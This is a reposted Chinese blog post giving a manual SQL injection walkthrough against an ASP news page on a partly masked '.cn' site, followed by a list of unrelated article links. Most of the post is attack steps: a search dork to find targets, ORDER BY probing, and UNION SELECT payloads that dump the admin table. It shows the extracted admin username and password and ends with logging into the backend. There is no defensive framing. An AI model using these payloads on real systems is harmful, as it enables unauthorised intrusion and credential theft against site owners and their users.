博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
SQL手工注入
阅读量:7237 次
发布时间:2019-06-29

本文共 553 字,大约阅读时间需要 1 分钟。

site:xx.cn  inurl:asp?id= //找文章

xx.cn/pth/onews.asp?id=243' //试注入

xx.cn/pth/onews.asp?id=243 order by 10

xx.cn/pth/onews.asp?id=243 order by 20 //order by 语句用于根据指定的列(字段)对结果集进行排序,这里是在爆字段长度

爆出字段长度为11

联合查询

xx.cn/pth/onews.asp?id=243 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin

或者

xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from admin

爆出2&&3,用字段(admin表中的admin字段与password字段)替换掉2&&3

xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin

爆出账号与密码:

账号:admin
密码:bfpms

找到后台:xx.cn

登陆即可

转载地址:http://oxofm.baihongyu.com/

你可能感兴趣的文章
数字签名时间戳服务器的原理 !
查看>>
C++ Split string into vector<string> by space
查看>>
JavaScript学习——内置属性
查看>>
Oracle Profile 使用详解--zhuanzai
查看>>
Hadoop-1.1.2、HBase-0.94.7完全分布式集群结构
查看>>
前端复习-01-dom操作包括ie和现代浏览器处理相关
查看>>
TP-Link wr703N 使用华为HiLink系列上网卡的设置【转】
查看>>
士兵杀敌(四)(树状数组+线段树)
查看>>
Linux 高可用(HA)集群基本概念2
查看>>
Struts+Spring+Hibernate整合入门详解
查看>>
[转载]浅谈组策略设置IE受信任站点
查看>>
【转】maven导出项目依赖的jar包
查看>>
JS实现文本复制与剪切
查看>>
s标签可以if elseif else
查看>>
每天一个linux命令(20):linux chmod命令
查看>>
MySQL复合分区
查看>>
[ACM] POJ 3687 Labeling Balls (拓扑排序,反向生成端)
查看>>
LeetCode - Permutation Sequence
查看>>
eval解析JSON中的注意点
查看>>
BootCamp支持软件6
查看>>